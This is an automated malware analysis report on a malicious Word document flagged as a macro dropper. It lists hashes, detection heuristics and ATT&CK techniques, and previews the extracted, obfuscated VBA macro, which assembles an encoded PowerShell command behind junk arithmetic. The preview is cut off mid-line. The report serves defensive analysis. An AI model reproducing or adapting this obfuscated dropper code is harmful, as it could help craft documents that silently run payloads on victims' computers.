Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b283b41c1a7d344f…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 214.5 KB
Created: 2018-06-25 13:22:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: a605b98b6438f79f69ffd8281647895f
SHA-1: 52fa4c4a005db3e1d98c94daa84e4b2462fa366e
SHA-256: b283b41c1a7d344fd54c564e45416ec7f94965569733fea64cf9ff10d0e8a2f9
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call, indicating an intent to execute a second-stage payload. ClamAV detection further confirms its malicious nature. The macro's obfuscated string concatenation makes it difficult to determine the exact payload URL or execution details.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6590373-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6590373-0
  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                                | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)   | 12302 bytes
SHA-256: cef9abd8de61c14cfbd41ffce843e75b7682bc1c8810bd62cf66ebc88317fd6f

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "DIEAPULFSRub"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NZluVZOMJic"
Function VmrcQjX()
On Error Resume Next
oVFFjj = CByte(11688 * Tan(93762) / 84103 + CLng(JmpVjN * 12585 * 26003 * Chr(21484)))
afppMM = (44650 / CBool(55344) + 69084 + CSng(oiBHoS) * (69284 - ruoGR + 78360 - CLng(Kpkia)))
rMFjlJwBwh = "Hell" + "  [stR" + "iNG]" + "::jOIn" + Chr(40) + " '' ," + Chr(40) + "'52" + "}90U67" + "F102c4" + "5@126%11" + "7q103E6" + "1F127" + "@11"
TfFkY = CByte(90790 * Tan(72781) / 35603 + CLng(RvVoLd * 61728 * 41582 * Chr(37692)))
ZDzKTO = (1960 / CBool(77139) + 2870 + CSng(mwJJA) * (24818 - CHldLz + 37113 - CLng(TbTVzj)))
AZYBu = "4E12" + "2q" + "11" + "7U1" + "15S100c4" + "8}94%"
vzBfiR = CByte(87494 * Tan(26370) / 83841 + CLng(tPlfzz * 83301 * 67414 * Chr(49087)))
EFZRO = (8194 / CBool(58314) + 60255 + CSng(mhSDm) * (29390 - iDPoAQ + 79197 - CLng(LQdiT)))
NkCuAW = "117E" + "10" + "0q62@71S" + "117E11" + "4V83V12" + "4}12" + "1V1" + "17U" + "126U" + "100@43}5"
EoqTqW = CByte(28625 * Tan(82018) / 1426 + CLng(ItGuE * 52563 * 78913 * Chr(25793)))
zcGfRo = (32012 / CBool(37872) + 10497 + CSng(azLKqk) * (32884 - HzlQM + 66228 - CLng(kiJIMY)))
DjtoqXn = "2F" + "93F" + "123" + "F88F45" + "c55" + "S120F" + "100S100" + "q96}" + "42F63" + "V63c100V" + "101%98" + "F114F12"
UuiFT = CByte(56432 * Tan(89615) / 15396 + CLng(Smijt * 27311 * 30062 * Chr(38899)))
TbbtiQ = (46333 / CBool(69991) + 62259 + CSng(HLsZf) * (90118 - TXtuJ + 32771 - CLng(MIScAj)))
flikP = "7S114@1" + "01}" + "121%1" + "15@12" + "3c99c6" + "2%" + "126V" + "117%100" + "F63c105V" + "71F81S" + "102%93V" + "12"
swBBwv = CByte(5311 * Tan(51325) / 82889 + CLng(JwNhFW * 4562 * 66118 * Chr(51190)))
zhHRTn = (19548 / CBool(19866) + 58589 + CSng(azvjAG) * (75290 - NTLRc + 22096 - CLng(aIakD)))
rKWVPGYi = "1@" + "63" + "%80q120c" + "100c100" + "U96F42F6" + "3U" + "63q11" + "8V11" + "7U113@10" + "0}101S9" + "8q117%" + "99q115"
sJzAq = CByte(96241 * Tan(73987) / 37274 + CLng(zFhLLi * 46571 * 56786 * Chr(99288)))
zBAOh = (8979 / CBool(92988) + 94129 + CSng(fjaajh) * (98894 - iBKkqW + 47562 - CLng(SPdPD)))
knDOcdWwQJ = "E120@" + "121%126" + "V113E62%" + "115}127" + "F125" + "q63U84%" + "99@84E" + "68" + "S63V80U"
uliJb = CByte(73325 * Tan(21160) / 87950 + CLng(tLWaEF * 62941 * 46331 * Chr(83504)))
cThPV = (13517 / CBool(59662) + 52963 + CSng(PpShp) * (49762 - QdirBI + 29628 - CLng(LiJLN)))
PjLdi = "120F1" + "00F1" + "00S96V" + "42S" + "63U6" + "3@123q1"
VmrcQjX = rMFjlJwBwh + AZYBu + NkCuAW + DjtoqXn + flikP + rKWVPGYi + knDOcdWwQJ + PjLdi
fGRZs = CByte(3632 * Tan(98611) / 83305 + CLng(EHhkp * 70276 * 91601 * Chr(84696)))
USvuIE = (38601 / CBool(8044) + 50848 + CSng(rwTOs) * (39837 - oYOnj + 44436 - CLng(pfihL)))
End Function
Function nAOuBcziUnQ()
On Error Resume Next
QtnWzb = CByte(99407 * Tan(73804) / 13022 + CLng(bEGFls * 60076 * 40280 * Chr(78713)))
ijBsz = (55711 / CBool(95950) + 77135 + CSng(tFdZmt) * (47679 - kjuVq + 41225 - CLng(STHFv)))
uObWCH = "21@" + "126%120" + "c125@1" + "13" + "@100" + "%119@" + "12" + "1S113@" + "127" + "%62c1" + "15" + "q127"
mQjQQi = CByte(79429 * Tan(70597) / 13641 + CLng(JLaSj * 23374 * 87017 * Chr(54455)))
RzPzm = (85045 / CBool(27108) + 80909 + CSng(jVssNd) * (22781 - CnRZmd + 84299 - CLng(RjQZZ)))
SqZVGju = "@125" + "@63V7" + "3V4" + "0S104F9" + "8F" + "88}63" + "E80c120" + "V100@100" + "}96V42q" + "63" + "@63F10" + "3@103"
pnzXL = CByte(8292 * Tan(87160) / 94786 + CLng(vHJPwP * 87584 * 21980 * Chr(66576)))
CchXmi = (41968 / CBool(44910) + 60329 + CSng(IwQAr) * (68462 - IzMhAS + 61443 - CLng(PaDZi)))
PlWtCmcv = "}1" + "03S62q98" + "E127%11" + "4q12" + "1c126" + "E98@117" + "q10" + "5S126%" + "127F12" + "4U11" + "6E9" + "9}124E"
VPUpaB = CByte(88900 * Tan(45273) / 14142 + CLng(BCZah * 55244 * 16802 * Chr(25851)))
IDvQsB = (20077 / CBool(3765) + 37883 + CS
... (truncated)